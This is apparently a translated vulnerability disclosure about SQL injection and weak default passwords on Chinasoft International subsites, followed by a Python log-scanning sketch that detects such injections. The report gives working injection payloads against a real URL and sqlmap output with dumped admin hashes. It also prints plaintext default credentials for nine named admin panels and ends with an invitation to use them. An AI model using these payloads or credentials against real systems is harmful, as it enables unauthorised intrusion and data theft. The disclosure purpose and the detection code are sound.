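2015-07-02: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
2015-08-16: The vendor has actively ignored the vulnerability; details disclosed to the public
SQL injection on a Chinasoft International subsite exposes the database + weak backend password on all subsites
1. SQL injection
Injection point: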
http://cqetc.chinasofti.com/list.php?c=8
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: c
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: c=8' AND 2516=2516 AND 'arSC'='arSC

    Type: UNION query
    Title: MySQL UNION query (NULL) - 13 columns
    Payload: c=8' LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a696d713a,0x665265615a424154514a,0x3a6977733a), NULL, NULL, NULL#
---
available databases [10]:
[*] cdetc
[*] cqetc
[*] dedecmsv57gbksp1
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpdisk
[*] test
[*] ultrax
[*] xaetc
Database: cdetc
[35 tables]
+--------------------------------+
| sql_module_advertisement       |
| sql_module_class               |
| sql_module_feedback            |
| sql_module_guestbook           |
| sql_module_guestbook_writeback |
| sql_module_link                |
| sql_module_search_word         |
| sql_module_switchimage         |
| sql_module_tagindex            |
| sql_module_template            |
| sql_system_public_article      |
| sql_system_public_class        |
| sql_system_public_content      |
| sql_system_public_custom       |
| sql_system_public_download     |
| sql_system_public_image        |
| sql_system_public_job          |
| sql_system_public_link         |
| sql_system_public_nav          |
| sql_system_public_nav_class    |
| sql_system_public_photo        |
| sql_system_public_product      |
| sql_system_public_type         |
| sql_user_admin                 |
| sql_user_admin_class           |
| sql_website_bg_notice          |
| sql_website_config             |
| sql_website_diary_record       |
| sql_website_file               |
| sql_website_file_cache         |
| sql_website_info               |
| sql_website_info_type          |
| sql_website_shortcut           |
| sql_website_update             |
| sql_website_word               |
+--------------------------------+
Database: cdetc
Table: sql_user_admin
[3 entries]
+---------------+----------------------------------+
| user          | password                         |
+---------------+----------------------------------+
| administrator | f48f8*****************b4fee55ec5 |
| hxkj          | f48f8*****************b4fee55ec5 |
| etc           | 0ab44*****************8d6faab1b8 |
+---------------+----------------------------------+
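Backend access obtained:
2. Weak backend password
After comparing, I found that the backends of the other subsites all run the same system, so I guessed that the administrator account's password was a default password.
Weak credentials: administrator administrator2018
Affected subsites: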
http://xmetc.chinasofti.com/manage/
http://xaetc.chinasofti.com/manage/
http://wxetc.chinasofti.com/manage/
http://tjetc.chinasofti.com/manage/
http://syetc.chinasofti.com/manage/
http://njetc.chinasofti.com/manage/
http://dletc.chinasofti.com/manage/
http://cqetc.chinasofti.com/manage/
http://cdetc.chinasofti.com/manage/
Same as above
You know what to do~
Unable to contact the vendor, or the vendor actively refused
Vulnerability Rank: 8 (WooYun rating)
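Both payload shapes in the sqlmap output in section 1 (boolean-based blind and UNION query on the `c` parameter) stand out in web server access logs if `c` is treated as an integer id. The following detection sketch is an added example, not part of the original report: the log lines are constructed, and the combined log format, the integer-only assumption for `c`, and the rule names are assumptions of this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (combined log format, documentation IPs).
# The payloads are the two shapes from the report; the UNION one is shortened.
SAMPLE_LOG = """\
198.51.100.7 - - [02/Jul/2015:10:00:01 +0800] "GET /list.php?c=8 HTTP/1.1" 200 5120
198.51.100.9 - - [02/Jul/2015:10:00:05 +0800] "GET /list.php?c=8%27%20AND%202516%3D2516%20AND%20%27arSC%27%3D%27arSC HTTP/1.1" 200 5120
198.51.100.9 - - [02/Jul/2015:10:00:06 +0800] "GET /list.php?c=8%27%20LIMIT%201%2C1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%23 HTTP/1.1" 200 5300
198.51.100.7 - - [02/Jul/2015:10:00:09 +0800] "GET /list.php?c=12&page=2 HTTP/1.1" 200 4800
"""

REQUEST = re.compile(r'^(?P<ip>\S+) .*?"(?:GET|POST) (?P<target>\S+) HTTP/[\d.]+"')

# Ordered most specific first; the names are this example's own labels.
RULES = [
    ("union-select", re.compile(r"\bunion\b.*\bselect\b", re.I | re.S)),
    ("boolean-tautology", re.compile(r"\b(?:and|or)\b\s+(\d+)\s*=\s*\1\b", re.I)),
    ("quote-breakout", re.compile(r"['\"]")),
]

def classify(value):
    """Return None for a plain integer id, else a label for why it was flagged."""
    if re.fullmatch(r"[0-9]{1,9}", value):
        return None
    for name, pattern in RULES:
        if pattern.search(value):
            return name
    return "non-integer"

def scan(log_text, path="/list.php", param="c"):
    """Return (client_ip, label, decoded_value) for each suspicious request."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if url.path != path:
            continue
        # parse_qs percent-decodes, so encoded payloads are matched in clear text.
        for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
            label = classify(value)
            if label:
                findings.append((m.group("ip"), label, value))
    return findings

if __name__ == "__main__":
    for ip, label, value in scan(SAMPLE_LOG):
        print(f"{ip}\t{label}\t{value!r}")
```

Anything other than a short decimal id is flagged, so a value that matches none of the named rules still surfaces as `non-integer`.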